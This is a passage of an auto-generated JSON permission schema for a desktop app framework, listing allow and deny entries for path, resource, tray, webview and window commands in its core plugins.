scope.","commands":{"allow":[],"deny":["set_as_window_menu"]}},"deny-set-as-windows-menu-for-nsapp":{"identifier":"deny-set-as-windows-menu-for-nsapp","description":"Denies the set_as_windows_menu_for_nsapp command without any pre-configured scope.","commands":{"allow":[],"deny":["set_as_windows_menu_for_nsapp"]}},"deny-set-checked":{"identifier":"deny-set-checked","description":"Denies the set_checked command without any pre-configured scope.","commands":{"allow":[],"deny":["set_checked"]}},"deny-set-enabled":{"identifier":"deny-set-enabled","description":"Denies the set_enabled command without any pre-configured scope.","commands":{"allow":[],"deny":["set_enabled"]}},"deny-set-icon":{"identifier":"deny-set-icon","description":"Denies the set_icon command without any pre-configured scope.","commands":{"allow":[],"deny":["set_icon"]}},"deny-set-text":{"identifier":"deny-set-text","description":"Denies the set_text command without any pre-configured scope.","commands":{"allow":[],"deny":["set_text"]}},"deny-text":{"identifier":"deny-text","description":"Denies the text command without any pre-configured scope.","commands":{"allow":[],"deny":["text"]}}},"permission_sets":{},"global_scope_schema":null},"core:path":{"default_permission":{"identifier":"default","description":"Default permissions for the plugin, which enables all commands.","permissions":["allow-resolve-directory","allow-resolve","allow-normalize","allow-join","allow-dirname","allow-extname","allow-basename","allow-is-absolute"]},"permissions":{"allow-basename":{"identifier":"allow-basename","description":"Enables the basename command without any pre-configured scope.","commands":{"allow":["basename"],"deny":[]}},"allow-dirname":{"identifier":"allow-dirname","description":"Enables the dirname command without any pre-configured scope.","commands":{"allow":["dirname"],"deny":[]}},"allow-extname":{"identifier":"allow-extname","description":"Enables the extname command without any pre-configured scope.","commands":{"allow":["extname"],"deny":[]}},"allow-is-absolute":{"identifier":"allow-is-absolute","description":"Enables the is_absolute command without any pre-configured scope.","commands":{"allow":["is_absolute"],"deny":[]}},"allow-join":{"identifier":"allow-join","description":"Enables the join command without any pre-configured scope.","commands":{"allow":["join"],"deny":[]}},"allow-normalize":{"identifier":"allow-normalize","description":"Enables the normalize command without any pre-configured scope.","commands":{"allow":["normalize"],"deny":[]}},"allow-resolve":{"identifier":"allow-resolve","description":"Enables the resolve command without any pre-configured scope.","commands":{"allow":["resolve"],"deny":[]}},"allow-resolve-directory":{"identifier":"allow-resolve-directory","description":"Enables the resolve_directory command without any pre-configured scope.","commands":{"allow":["resolve_directory"],"deny":[]}},"deny-basename":{"identifier":"deny-basename","description":"Denies the basename command without any pre-configured scope.","commands":{"allow":[],"deny":["basename"]}},"deny-dirname":{"identifier":"deny-dirname","description":"Denies the dirname command without any pre-configured scope.","commands":{"allow":[],"deny":["dirname"]}},"deny-extname":{"identifier":"deny-extname","description":"Denies the extname command without any pre-configured scope.","commands":{"allow":[],"deny":["extname"]}},"deny-is-absolute":{"identifier":"deny-is-absolute","description":"Denies the is_absolute command without any pre-configured scope.","commands":{"allow":[],"deny":["is_absolute"]}},"deny-join":{"identifier":"deny-join","description":"Denies the join command without any pre-configured scope.","commands":{"allow":[],"deny":["join"]}},"deny-normalize":{"identifier":"deny-normalize","description":"Denies the normalize command without any pre-configured scope.","commands":{"allow":[],"deny":["normalize"]}},"deny-resolve":{"identifier":"deny-resolve","description":"Denies the resolve command without any pre-configured scope.","commands":{"allow":[],"deny":["resolve"]}},"deny-resolve-directory":{"identifier":"deny-resolve-directory","description":"Denies the resolve_directory command without any pre-configured scope.","commands":{"allow":[],"deny":["resolve_directory"]}}},"permission_sets":{},"global_scope_schema":null},"core:resources":{"default_permission":{"identifier":"default","description":"Default permissions for the plugin, which enables all commands.","permissions":["allow-close"]},"permissions":{"allow-close":{"identifier":"allow-close","description":"Enables the close command without any pre-configured scope.","commands":{"allow":["close"],"deny":[]}},"deny-close":{"identifier":"deny-close","description":"Denies the close command without any pre-configured scope.","commands":{"allow":[],"deny":["close"]}}},"permission_sets":{},"global_scope_schema":null},"core:tray":{"default_permission":{"identifier":"default","description":"Default permissions for the plugin, which enables all commands.","permissions":["allow-new","allow-get-by-id","allow-remove-by-id","allow-set-icon","allow-set-menu","allow-set-tooltip","allow-set-title","allow-set-visible","allow-set-temp-dir-path","allow-set-icon-as-template","allow-set-icon-with-as-template","allow-set-show-menu-on-left-click"]},"permissions":{"allow-get-by-id":{"identifier":"allow-get-by-id","description":"Enables the get_by_id command without any pre-configured scope.","commands":{"allow":["get_by_id"],"deny":[]}},"allow-new":{"identifier":"allow-new","description":"Enables the new command without any pre-configured scope.","commands":{"allow":["new"],"deny":[]}},"allow-remove-by-id":{"identifier":"allow-remove-by-id","description":"Enables the remove_by_id command without any pre-configured scope.","commands":{"allow":["remove_by_id"],"deny":[]}},"allow-set-icon":{"identifier":"allow-set-icon","description":"Enables the set_icon command without any pre-configured scope.","commands":{"allow":["set_icon"],"deny":[]}},"allow-set-icon-as-template":{"identifier":"allow-set-icon-as-template","description":"Enables the set_icon_as_template command without any pre-configured scope.","commands":{"allow":["set_icon_as_template"],"deny":[]}},"allow-set-icon-with-as-template":{"identifier":"allow-set-icon-with-as-template","description":"Enables the set_icon_with_as_template command without any pre-configured scope.","commands":{"allow":["set_icon_with_as_template"],"deny":[]}},"allow-set-menu":{"identifier":"allow-set-menu","description":"Enables the set_menu command without any pre-configured scope.","commands":{"allow":["set_menu"],"deny":[]}},"allow-set-show-menu-on-left-click":{"identifier":"allow-set-show-menu-on-left-click","description":"Enables the set_show_menu_on_left_click command without any pre-configured scope.","commands":{"allow":["set_show_menu_on_left_click"],"deny":[]}},"allow-set-temp-dir-path":{"identifier":"allow-set-temp-dir-path","description":"Enables the set_temp_dir_path command without any pre-configured scope.","commands":{"allow":["set_temp_dir_path"],"deny":[]}},"allow-set-title":{"identifier":"allow-set-title","description":"Enables the set_title command without any pre-configured scope.","commands":{"allow":["set_title"],"deny":[]}},"allow-set-tooltip":{"identifier":"allow-set-tooltip","description":"Enables the set_tooltip command without any pre-configured scope.","commands":{"allow":["set_tooltip"],"deny":[]}},"allow-set-visible":{"identifier":"allow-set-visible","description":"Enables the set_visible command without any pre-configured scope.","commands":{"allow":["set_visible"],"deny":[]}},"deny-get-by-id":{"identifier":"deny-get-by-id","description":"Denies the get_by_id command without any pre-configured scope.","commands":{"allow":[],"deny":["get_by_id"]}},"deny-new":{"identifier":"deny-new","description":"Denies the new command without any pre-configured scope.","commands":{"allow":[],"deny":["new"]}},"deny-remove-by-id":{"identifier":"deny-remove-by-id","description":"Denies the remove_by_id command without any pre-configured scope.","commands":{"allow":[],"deny":["remove_by_id"]}},"deny-set-icon":{"identifier":"deny-set-icon","description":"Denies the set_icon command without any pre-configured scope.","commands":{"allow":[],"deny":["set_icon"]}},"deny-set-icon-as-template":{"identifier":"deny-set-icon-as-template","description":"Denies the set_icon_as_template command without any pre-configured scope.","commands":{"allow":[],"deny":["set_icon_as_template"]}},"deny-set-icon-with-as-template":{"identifier":"deny-set-icon-with-as-template","description":"Denies the set_icon_with_as_template command without any pre-configured scope.","commands":{"allow":[],"deny":["set_icon_with_as_template"]}},"deny-set-menu":{"identifier":"deny-set-menu","description":"Denies the set_menu command without any pre-configured scope.","commands":{"allow":[],"deny":["set_menu"]}},"deny-set-show-menu-on-left-click":{"identifier":"deny-set-show-menu-on-left-click","description":"Denies the set_show_menu_on_left_click command without any pre-configured scope.","commands":{"allow":[],"deny":["set_show_menu_on_left_click"]}},"deny-set-temp-dir-path":{"identifier":"deny-set-temp-dir-path","description":"Denies the set_temp_dir_path command without any pre-configured scope.","commands":{"allow":[],"deny":["set_temp_dir_path"]}},"deny-set-title":{"identifier":"deny-set-title","description":"Denies the set_title command without any pre-configured scope.","commands":{"allow":[],"deny":["set_title"]}},"deny-set-tooltip":{"identifier":"deny-set-tooltip","description":"Denies the set_tooltip command without any pre-configured scope.","commands":{"allow":[],"deny":["set_tooltip"]}},"deny-set-visible":{"identifier":"deny-set-visible","description":"Denies the set_visible command without any pre-configured scope.","commands":{"allow":[],"deny":["set_visible"]}}},"permission_sets":{},"global_scope_schema":null},"core:webview":{"default_permission":{"identifier":"default","description":"Default permissions for the plugin.","permissions":["allow-get-all-webviews","allow-webview-position","allow-webview-size","allow-internal-toggle-devtools"]},"permissions":{"allow-clear-all-browsing-data":{"identifier":"allow-clear-all-browsing-data","description":"Enables the clear_all_browsing_data command without any pre-configured scope.","commands":{"allow":["clear_all_browsing_data"],"deny":[]}},"allow-create-webview":{"identifier":"allow-create-webview","description":"Enables the create_webview command without any pre-configured scope.","commands":{"allow":["create_webview"],"deny":[]}},"allow-create-webview-window":{"identifier":"allow-create-webview-window","description":"Enables the create_webview_window command without any pre-configured scope.","commands":{"allow":["create_webview_window"],"deny":[]}},"allow-get-all-webviews":{"identifier":"allow-get-all-webviews","description":"Enables the get_all_webviews command without any pre-configured scope.","commands":{"allow":["get_all_webviews"],"deny":[]}},"allow-internal-toggle-devtools":{"identifier":"allow-internal-toggle-devtools","description":"Enables the internal_toggle_devtools command without any pre-configured scope.","commands":{"allow":["internal_toggle_devtools"],"deny":[]}},"allow-print":{"identifier":"allow-print","description":"Enables the print command without any pre-configured scope.","commands":{"allow":["print"],"deny":[]}},"allow-reparent":{"identifier":"allow-reparent","description":"Enables the reparent command without any pre-configured scope.","commands":{"allow":["reparent"],"deny":[]}},"allow-set-webview-auto-resize":{"identifier":"allow-set-webview-auto-resize","description":"Enables the set_webview_auto_resize command without any pre-configured scope.","commands":{"allow":["set_webview_auto_resize"],"deny":[]}},"allow-set-webview-background-color":{"identifier":"allow-set-webview-background-color","description":"Enables the set_webview_background_color command without any pre-configured scope.","commands":{"allow":["set_webview_background_color"],"deny":[]}},"allow-set-webview-focus":{"identifier":"allow-set-webview-focus","description":"Enables the set_webview_focus command without any pre-configured scope.","commands":{"allow":["set_webview_focus"],"deny":[]}},"allow-set-webview-position":{"identifier":"allow-set-webview-position","description":"Enables the set_webview_position command without any pre-configured scope.","commands":{"allow":["set_webview_position"],"deny":[]}},"allow-set-webview-size":{"identifier":"allow-set-webview-size","description":"Enables the set_webview_size command without any pre-configured scope.","commands":{"allow":["set_webview_size"],"deny":[]}},"allow-set-webview-zoom":{"identifier":"allow-set-webview-zoom","description":"Enables the set_webview_zoom command without any pre-configured scope.","commands":{"allow":["set_webview_zoom"],"deny":[]}},"allow-webview-close":{"identifier":"allow-webview-close","description":"Enables the webview_close command without any pre-configured scope.","commands":{"allow":["webview_close"],"deny":[]}},"allow-webview-hide":{"identifier":"allow-webview-hide","description":"Enables the webview_hide command without any pre-configured scope.","commands":{"allow":["webview_hide"],"deny":[]}},"allow-webview-position":{"identifier":"allow-webview-position","description":"Enables the webview_position command without any pre-configured scope.","commands":{"allow":["webview_position"],"deny":[]}},"allow-webview-show":{"identifier":"allow-webview-show","description":"Enables the webview_show command without any pre-configured scope.","commands":{"allow":["webview_show"],"deny":[]}},"allow-webview-size":{"identifier":"allow-webview-size","description":"Enables the webview_size command without any pre-configured scope.","commands":{"allow":["webview_size"],"deny":[]}},"deny-clear-all-browsing-data":{"identifier":"deny-clear-all-browsing-data","description":"Denies the clear_all_browsing_data command without any pre-configured scope.","commands":{"allow":[],"deny":["clear_all_browsing_data"]}},"deny-create-webview":{"identifier":"deny-create-webview","description":"Denies the create_webview command without any pre-configured scope.","commands":{"allow":[],"deny":["create_webview"]}},"deny-create-webview-window":{"identifier":"deny-create-webview-window","description":"Denies the create_webview_window command without any pre-configured scope.","commands":{"allow":[],"deny":["create_webview_window"]}},"deny-get-all-webviews":{"identifier":"deny-get-all-webviews","description":"Denies the get_all_webviews command without any pre-configured scope.","commands":{"allow":[],"deny":["get_all_webviews"]}},"deny-internal-toggle-devtools":{"identifier":"deny-internal-toggle-devtools","description":"Denies the internal_toggle_devtools command without any pre-configured scope.","commands":{"allow":[],"deny":["internal_toggle_devtools"]}},"deny-print":{"identifier":"deny-print","description":"Denies the print command without any pre-configured scope.","commands":{"allow":[],"deny":["print"]}},"deny-reparent":{"identifier":"deny-reparent","description":"Denies the reparent command without any pre-configured scope.","commands":{"allow":[],"deny":["reparent"]}},"deny-set-webview-auto-resize":{"identifier":"deny-set-webview-auto-resize","description":"Denies the set_webview_auto_resize command without any pre-configured scope.","commands":{"allow":[],"deny":["set_webview_auto_resize"]}},"deny-set-webview-background-color":{"identifier":"deny-set-webview-background-color","description":"Denies the set_webview_background_color command without any pre-configured scope.","commands":{"allow":[],"deny":["set_webview_background_color"]}},"deny-set-webview-focus":{"identifier":"deny-set-webview-focus","description":"Denies the set_webview_focus command without any pre-configured scope.","commands":{"allow":[],"deny":["set_webview_focus"]}},"deny-set-webview-position":{"identifier":"deny-set-webview-position","description":"Denies the set_webview_position command without any pre-configured scope.","commands":{"allow":[],"deny":["set_webview_position"]}},"deny-set-webview-size":{"identifier":"deny-set-webview-size","description":"Denies the set_webview_size command without any pre-configured scope.","commands":{"allow":[],"deny":["set_webview_size"]}},"deny-set-webview-zoom":{"identifier":"deny-set-webview-zoom","description":"Denies the set_webview_zoom command without any pre-configured scope.","commands":{"allow":[],"deny":["set_webview_zoom"]}},"deny-webview-close":{"identifier":"deny-webview-close","description":"Denies the webview_close command without any pre-configured scope.","commands":{"allow":[],"deny":["webview_close"]}},"deny-webview-hide":{"identifier":"deny-webview-hide","description":"Denies the webview_hide command without any pre-configured scope.","commands":{"allow":[],"deny":["webview_hide"]}},"deny-webview-position":{"identifier":"deny-webview-position","description":"Denies the webview_position command without any pre-configured scope.","commands":{"allow":[],"deny":["webview_position"]}},"deny-webview-show":{"identifier":"deny-webview-show","description":"Denies the webview_show command without any pre-configured scope.","commands":{"allow":[],"deny":["webview_show"]}},"deny-webview-size":{"identifier":"deny-webview-size","description":"Denies the webview_size command without any pre-configured scope.","commands":{"allow":[],"deny":["webview_size"]}}},"permission_sets":{},"global_scope_schema":null},"core:window":{"default_permission":{"identifier":"default","description":"Default permissions for the plugin.","permissions":["allow-get-all-windows","allow-scale-factor","allow-inner-position","allow-outer-position","allow-inner-size","allow-outer-size","allow-is-fullscreen","allow-is-minimized","allow-is-maximized","allow-is-focused","allow-is-decorated","allow-is-resizable","allow-is-maximizable","allow-is-minimizable","allow-is-closable","allow-is-visible","allow-is-enabled","allow-title","allow-current-monitor","allow-primary-monitor","allow-monitor-from-point","allow-available-monitors","allow-cursor-position","allow-theme","allow-is-always-on-top","allow-activity-name","allow-scene-identifier","allow-internal-toggle-maximize"]},"permissions":{"allow-activity-name":{"identifier":"allow-activity-name","description":"Enables the activity_name command without any pre-configured scope.","commands":{"allow":["activity_name"],"deny":[]}},"allow-available-monitors":{"identifier":"allow-available-monitors","description":"Enables the available_monitors command without any pre-configured scope.","commands":{"allow":["available_monitors"],"deny":[]}},"allow-center":{"identifier":"allow-center","description":"Enables the center command without any pre-configured scope.","commands":{"allow":["center"],"deny":[]}},"allow-close":{"identifier":"allow-close","description":"Enables the close command without any pre-configured scope.","commands":{"allow":["close"],"deny":[]}},"allow-create":{"identifier":"allow-create","description":"Enables the create command without any pre-configured scope.","commands":{"allow":["create"],"deny":[]}},"allow-current-monitor":{"identifier":"allow-current-monitor","description":"Enables the current_monitor command without any pre-configured scope.","commands":{"allow":["current_monitor"],"deny":[]}},"allow-cursor-position":{"identifier":"allow-cursor-position","description":"Enables the cursor_position command without any pre-configured scope.","commands":{"allow":["cursor_position"],"deny":[]}},"allow-destroy":{"identifier":"allow-destroy","description":"Enables the destroy command without any pre-configured scope.","commands":{"allow":["destroy"],"deny":[]}},"allow-get-all-windows":{"identifier":"allow-get-all-windows","description":"Enables the get_all_windows command without any pre-configured scope.","commands":{"allow":["get_all_windows"],"deny":[]}},"allow-hide":{"identifier":"allow-hide","description":"Enables the hide command without any pre-configured scope.","commands":{"allow":["hide"],"deny":[]}},"allow-inner-position":{"identifier":"allow-inner-position","description":"Enables the inner_position command without any pre-configured scope.","commands":{"allow":["inner_position"],"deny":[]}},"allow-inner-size":{"identifier":"allow-inner-size","description":"Enables the inner_size command without any pre-configured scope.","commands":{"allow":["inner_size"],"deny":[]}},"allow-internal-toggle-maximize":{"identifier":"allow-internal-toggle-maximize","description":"Enables the internal_toggle_maximize command without any pre-configured scope.","commands":{"allow":["internal_toggle_maximize"],"deny":[]}},"allow-is-always-on-top":{"identifier":"allow-is-always-on-top","description":"Enables the is_always_on_top command without any pre-configured scope.","commands":{"allow":["is_always_on_top"],"deny":[]}},"allow-is-closable":{"identifier":"allow-is-closable","description":"Enables the is_closable command without any pre-configured scope.","commands":{"allow":["is_closable"],"deny":[]}},"allow-is-decorated":{"identifier":"allow-is-decorated","description":"Enables the is_decorated command without any pre-configured scope.","commands":{"allow":["is_decorated"],"deny":[]}},"allow-is-enabled":{"identifier":"allow-is-enabled","description":"Enables the is_enabled command without any pre-configured scope.","commands":{"allow":["is_enabled"],"deny":[]}},"allow-is-focused":{"identifier":"allow-is-focused","description":"Enables the is_focused command without any pre-configured scope.","commands":{"allow":["is_focused"],"deny":[]}},"allow-is-fullscreen":{"identifier":"allow-is-fullscreen","description":"Enables the is_fullscreen command without any pre-configured scope.","commands":{"allow":["is_fullscreen"],"deny":[]}},"allow-is-maximizable":{"identifier":"allow-is-maximizable","description":"Enables the is_maximizable command without any pre-configured scope.","commands":{"allow":["is_maximizable"],"deny":[]}},"allow-is-maximized":{"identifier":"allow-is-maximized","description":"Enables the is_maximized command without any pre-configured scope.","commands":{"allow":["is_maximized"],"deny":[]}},"allow-is-minimizable":{"identifier":"allow-is-minimizable","description":"Enables the is_minimizable command without any pre-configured scope.","commands":{"allow":["is_minimizable"],"deny":[]}},"allow-is-minimized":{"identifier":"allow-is-minimized","description":"Enables the is_minimized command without any pre-configured scope.","commands":{"allow":["is_minimized"],"deny":[]}},"allow-is-resizable":{"identifier":"allow-is-resizable","description":"Enables the is_resizable command without any pre-configured scope.","commands":{"allow":["is_resizable"],"deny":[]}},"allow-is-visible":{"identifier":"allow-is-visible","description":"Enables the is_visible command without any pre-configured scope.","commands":{"allow":["is_visible"],"deny":[]}},"allow-maximize":{"identifier":"allow-maximize","description":"Enables the maximize command without any pre-configured scope.","commands":{"allow":["maximize"],"deny":[]}},"allow-minimize":{"identifier":"allow-minimize","description":"Enables the minimize command without any pre-configured scope.","commands":{"allow":["minimize"],"deny":[]}},"allow-monitor-from-point":{"identifier":"allow-monitor-from-point","description":"Enables the monitor_from_point command without any pre-configured scope.","commands":{"allow":["monitor_from_point"],"deny":[]}},"allow-outer-position":{"identifier":"allow-outer-position","description":"Enables the outer_position command without any pre-configured scope.","commands":{"allow":["outer_position"],"deny":[]}},"allow-outer-size":{"identifier":"allow-outer-size","description":"Enables the outer_size command without any pre-configured scope.","commands":{"allow":["outer_size"],"deny":[]}},"allow-primary-monitor":{"identifier":"allow-primary-monitor","description":"Enables the primary_monitor command without any pre-configured scope.","commands":{"allow":["primary_monitor"],"deny":[]}},"allow-request-user-attention":{"identifier":"allow-request-user-attention","description":"Enables the request_user_attention command without any pre-configured scope.","commands":{"allow":["request_user_attention"],"deny":[]}},"allow-scale-factor":{"identifier":"allow-scale-factor","description":"Enables the scale_factor command without any pre-configured scope.","commands":{"allow":["scale_factor"],"deny":[]}},"allow-scene-identifier":{"identifier":"allow-scene-identifier","description":"Enables the scene_identifier command without any pre-configured scope.","commands":{"allow":["scene_identifier"],"deny":[]}},"allow-set-always-on-bottom":{"identifier":"allow-set-always-on-bottom","description":"Enables the set_always_on_bottom command without any pre-configured scope.","commands":{"allow":["set_always_on_bottom"],"deny":[]}},"allow-set-always-on-top":{"identifier":"allow-set-always-on-top","description":"Enables the set_always_on_top command without any pre-configured scope.","commands":{"allow":["set_always_on_top"],"deny":[]}},"allow-set-background-color":{"identifier":"allow-set-background-color","description":"Enables the set_background_color command without any pre-configured scope.","commands":{"allow":["set_background_color"],"deny":[]}},"allow-set-badge-count":{"identifier":"allow-set-badge-count","description":"Enables the set_badge_count command without any pre-configured scope.","commands":{"allow":["set_badge_count"],"deny":[]}},"allow-set-badge-label":{"identifier":"allow-set-badge-label","description":"Enables the set_badge_label command without any pre-configured scope.","commands":{"allow":["set_badge_label"],"deny":[]}},"allow-set-closable":{"identifier":"allow-set-closable","description":"Enables the set_closable command without any pre-configured scope.","commands":{"allow":["set_closable"],"deny":[]}},"allow-set-content-protected":{"identifier":"allow-set-content-protected","description":"Enables the set_content_protected command without any pre-configured scope.","commands":{"allow":["set_content_protected"],"deny":[]}},"allow-set-cursor-grab":{"identifier":"allow-set-cursor-grab","description":"Enables the set_cursor_grab command without any pre-configured scope.","commands":{"allow":["set_cursor_grab"],"deny":[]}},"allow-set-cursor-icon":{"identifier":"allow-set-cursor-icon","description":"Enables the set_cursor_icon command without any pre-configured scope.","commands":{"allow":["set_cursor_icon"],"deny":[]}},"allow-set-cursor-position":{"identifier":"allow-set-cursor-position","description":"Enables the set_cursor_position command without any pre-configured scope.","commands":{"allow":["set_cursor_position"],"deny":[]}},"allow-set-cursor-visible":{"identifier":"allow-set-cursor-visible","description":"Enables the set_cursor_visible command without any pre-configured scope.","commands":{"allow":["set_cursor_visible"],"deny":[]}},"allow-set-decorations":{"identifier":"allow-set-decorations","description":"Enables the set_decorations command without any pre-configured scope.","commands":{"allow":["set_decorations"],"deny":[]}},"allow-set-effects":{"identifier":"allow-set-effects","description":"Enables the set_effects command without any pre-configured scope.","commands":{"allow":["set_effects"],"deny":[]}},"allow-set-enabled":{"identifier":"allow-set-enabled","description":"Enables the set_enabled command without any pre-configured scope.","commands":{"allow":["set_enabled"],"deny":[]}},"allow-set-focus":{"identifier":"allow-set-focus","description":"Enables the set_focus command without any pre-configured scope.","commands":{"allow":["set_focus"],"deny":[]}},"allow-set-focusable":{"identifier":"allow-set-focusable","description":"Enables the set_focusable command without any pre-configured scope.","commands":{"allow":["set_focusable"],"deny":[]}},"allow-set-fullscreen":{"identifier":"allow-set-fullscreen","description":"Enables the set_fullscreen command without any pre-configured scope.","commands":{"allow":["set_fullscreen"],"deny":[]}},"allow-set-icon":{"identifier":"allow-set-icon","description":"Enables the set_icon command without any pre-configured scope.","commands":{"allow":["set_icon"],"deny":[]}},"allow-set-ignore-cursor-events":{"identifier":"allow-set-ignore-cursor-events","description":"Enables the set_ignore_cursor_events command without any pre-configured scope.","commands":{"allow":["set_ignore_cursor_events"],"deny":[]}},"allow-set-max-size":{"identifier":"allow-set-max-size","description":"Enables the set_max_size command without any pre-configured scope.","commands":{"allow":["set_max_size"],"deny":[]}},"allow-set-maximizable":{"identifier":"allow-set-maximizable","description":"Enables the set_maximizable command without any pre-configured scope.","commands":{"allow":["set_maximizable"],"deny":[]}},"allow-set-min-size":{"identifier":"allow-set-min-size","description":"Enables the set_min_size command without any pre-configured scope.","commands":{"allow":["set_min_size"],"deny":[]}},"allow-set-minimizable":{"identifier":"allow-set-minimizable","description":"Enables the set_minimizable command without any pre-configured scope.","commands":{"allow":["set_minimizable"],"deny":[]}},"allow-set-overlay-icon":{"identifier":"allow-set-overlay-icon","description":"Enables the set_overlay_icon command without any pre-configured scope.","commands":{"allow":["set_overlay_icon"],"deny":[]}},"allow-set-position":{"identifier":"allow-set-position","description":"Enables the set_position command without any pre-configured scope.","commands":{"allow":["set_position"],"deny":[]}},"allow-set-progress-bar":{"identifier":"allow-set-progress-bar","description":"Enables the set_progress_bar command without any pre-configured scope.","commands":{"allow":["set_progress_bar"],"deny":[]}},"allow-set-resizable":{"identifier":"allow-set-resizable","description":"Enables the set_resizable command without any pre-configured scope.","commands":{"allow":["set_resizable"],"deny":[]}},"allow-set-shadow":{"identifier":"allow-set-shadow","description":"Enables the set_shadow command without any pre-configured scope.","commands":{"allow":["set_shadow"],"deny":[]}},"allow-set-simple-fullscreen":{"identifier":"allow-set-simple-fullscreen","description":"Enables the set_simple_fullscreen command without any pre-configured scope.","commands":{"allow":["set_simple_fullscreen"],"deny":[]}},"allow-set-size":{"identifier":"allow-set-size","description":"Enables the set_size command without any pre-configured scope.","commands":{"allow":["set_size"],"deny":[]}},"allow-set-size-constraints":{"identifier":"allow-set-size-constraints","description":"Enables the set_size_constraints command without any pre-configured scope.","commands":{"allow":["set_size_constraints"],"deny":[]}},"allow-set-skip-taskbar":{"identifier":"allow-set-skip-taskbar","description":"Enables the set_skip_taskbar command without any pre-configured scope.","commands":{"allow":["set_skip_taskbar"],"deny":[]}},"allow-set-theme":{"identifier":"allow-set-theme","description":"Enables the set_theme command without any pre-configured scope.","commands":{"allow":["set_theme"],"deny":[]}},"allow-set-title":{"identifier":"allow-set-title","description":"Enables the set_title command without any pre-configured scope.","commands":{"allow":["set_title"],"deny":[]}},"allow-set-title-bar-style":{"identifier":"allow-set-title-bar-style","description":"Enables the set_title_bar_style command without any pre-configured scope.","commands":{"allow":["set_title_bar_style"],"deny":[]}},"allow-set-visible-on-all-workspaces":{"identifier":"allow-set-visible-on-all-workspaces","description":"Enables the set_visible_on_all_workspaces command without any pre-configured scope.","commands":{"allow":["set_visible_on_all_workspaces"],"deny":[]}},"allow-show":{"identifier":"allow-show","description":"Enables the show command without any pre-configured scope.","commands":{"allow":["show"],"deny":[]}},"allow-start-dragging":{"identifier":"allow-start-dragging","description":"Enables the start_dragging command without any pre-configured scope.","commands":{"allow":["start_dragging"],"deny":[]}},"allow-start-resize-dragging":{"identifier":"allow-start-resize-dragging","description":"Enables the start_resize_dragging command without any pre-configured scope.","commands":{"allow":["start_resize_dragging"],"deny":[]}},"allow-theme":{"identifier":"allow-theme","description":"Enables the theme command without any pre-configured scope.","commands":{"allow":["theme"],"deny":[]}},"allow-title":{"identifier":"allow-title","description":"Enables the title command without any pre-configured scope.","commands":{"allow":["title"],"deny":[]}},"allow-toggle-maximize":{"identifier":"allow-toggle-maximize","description":"Enables the toggle_maximize command without any pre-configured scope.","commands":{"allow":["toggle_maximize"],"deny":[]}},"allow-unmaximize":{"identifier":"allow-unmaximize","description":"Enables the unmaximize command without any pre-configured scope.","commands":{"allow":["unmaximize"],"deny":[]}},"allow-unminimize":{"identifier":"allow-unminimize","description":"Enables the unminimize command without any pre-configured scope.","commands":{"allow":["unminimize"],"deny":[]}},"deny-activity-name":{"identifier":"deny-activity-name","description":"Denies the activity_name command without any pre-configured scope.","commands":{"allow":[],"deny":["activity_name"]}},"deny-available-monitors":{"identifier":"deny-available-monitors","description":"Denies the available_monitors command without any pre-configured scope.","commands":{"allow":[],"deny":["available_monitors"]}},"deny-center":{"identifier":"deny-center","description":"Denies the center command without any pre-configured scope.","commands":{"allow":[],"deny":["center"]}},"deny-close":{"identifier":"deny-close","description":"Denies the close command without any pre-configured scope.","commands":{"allow":[],"deny":["close"]}},"deny-create":{"identifier":"deny-create","description":"Denies the create command without any pre-configured scope.","commands":{"allow":[],"deny":["create"]}},"deny-current-monitor":{"identifier":"deny-current-monitor","description":"Denies the current_monitor command without any pre-configured scope.","commands":{"allow":[],"deny":["current_monitor"]}},"deny-cursor-position":{"identifier":"deny-cursor-position","description":"Denies the cursor_position command without any pre-configured scope.","commands":{"allow":[],"deny":["cursor_position"]}},"deny-destroy":{"identifier":"deny-destroy","description":"Denies the destroy command without any pre-configured scope.","commands":{"allow":[],"deny":["destroy"]}},"deny-get-all-windows":{"identifier":"deny-get-all-windows","description":"Denies the get_all_windows command without any pre-configured scope.","commands":{"allow":[],"deny":["get_all_windows"]}},"deny-hide":{"identifier":"deny-hide","description":"Denies the hide command without any pre-configured scope.","commands":{"allow":[],"deny":["hide"]}},"deny-inner-position":{"identifier":"deny-inner-position","description":"Denies the inner_position command without any pre-configured scope.","commands":{"allow":[],"deny":["inner_position"]}},"deny-inner-size":{"identifier":"deny-inner-size","description":"Denies the inner_size command without any pre-configured scope.","commands":{"allow":[],"deny":["inner_size"]}},"deny-internal-toggle-maximize":{"identifier":"deny-internal-toggle-maximize","description":"Denies the internal_toggle_maximize command without any pre-configured scope.","commands":{"allow":[],"deny":["internal_toggle_maximize"]}},"deny-is-always-on-top":{"identifier":"deny-is-always-on-top","description":"Denies the is_always_on_top command without any pre-configured scope.","commands":{"allow":[],"deny":["is_always_on_top"]}},"deny-is-closable":{"identifier":"deny-is-closable","description":"Denies the is_closable command without any pre-configured scope.","commands":{"allow":[],"deny":["is_closable"]}},"deny-is-decorated":{"identifier":"deny-is-decorated","description":"Denies the is_decorated command without any pre-configured scope.","commands":{"allow":[],"deny":["is_decorated"]}},"deny-is-enabled":{"identifier":"deny-is-enabled","description":"Denies the is_enabled command without any pre-configured scope.","commands":{"allow":[],"deny":["is_enabled"]}},"deny-is-focused":{"identifier":"deny-is-focused","description":"Denies the is_focused command without any pre-configured scope.","commands":{"allow":[],"deny":["is_focused"]}},"deny-is-fullscreen":{"identifier":"deny-is-fullscreen","description":"Denies the is_fullscreen command without any pre-configured scope.","commands":{"allow":[],"deny":["is_fullscreen"]}},"deny-is-maximizable":{"identifier":"deny-is-maximizable","description":"Denies the is_maximizable command without any pre-configured scope.","commands":{"allow":[],"deny":["is_maximizable"]}},"deny-is-maximized":{"identifier":"deny-is-maximized","description":"Denies the is_maximized command without any pre-configured scope.","commands":{"allow":[],"deny":["is_maximized"]}},"deny-is-minimizable":{"identifier":"deny-is-minimizable","description":"Denies the is_minimizable command without any pre-configured scope.","commands":{"allow":[],"deny":["is_minimizable"]}},"deny-is-minimized":{"identifier":"deny-is-minimized","description":"Denies the is_minimized command without any pre-configured scope.","commands":{"allow":[],"deny":["is_minimized"]}},"deny-is-resizable":{"identifier":"deny-is-resizable","description":"Denies the is_resizable command without any pre-configured scope.","commands":{"allow":[],"deny":["is_resizable"]}},"deny-is-visible":{"identifier":"deny-is-visible","description":"Denies the is_visible command without any pre-configured scope.","commands":{"allow":[],"deny":["is_visible"]}},"deny-maximize":{"identifier":"deny-maximize","description":"Denies the maximize command without any pre-configured scope.","commands":{"allow":[],"deny":["maximize"]}},"deny-minimize":{"identifier":"deny-minimize","description":"Denies the minimize command without any pre-configured 